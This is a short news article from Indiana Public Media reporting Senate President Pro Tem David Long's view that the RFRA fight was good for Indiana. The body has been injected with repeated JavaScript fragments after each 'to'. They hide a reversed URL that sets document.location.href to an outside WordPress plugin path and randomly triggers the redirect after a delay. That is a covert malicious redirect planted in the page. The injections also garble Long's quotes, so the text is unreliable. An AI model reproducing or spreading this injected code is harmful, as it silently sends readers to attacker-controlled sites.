Network Indiana, Senate GOP Leader: RFRA Was ‘A Good Thing’ For Indiana, Indiana Public Media

Indiana Senate President Pro Tem David Long, R-Fort Wayne, says the RFRA battle was ultimately a good thing for the Hoosier State.

He says the ordeal made lawmakers more sensitive toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to issues involving the LGBT community.

“It’s on the front burner as far as discussions about where we go from here, and I don’t want toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to make predictions, but I think that was a good thing for our state toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to go through,” Long says.

However, Long maintains the original legislation did not discriminate against gays and lesbians, and he says discrimination was never the intent.

“My takeaway is I think we have toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to do a better job of saying that religious liberty and individual rights can co-exist in harmony without anyone’s rights being trampled on,” he says.

Long says he thinks lawmakers succeeded in reversing what might have become long term, negative perceptions about Indiana.
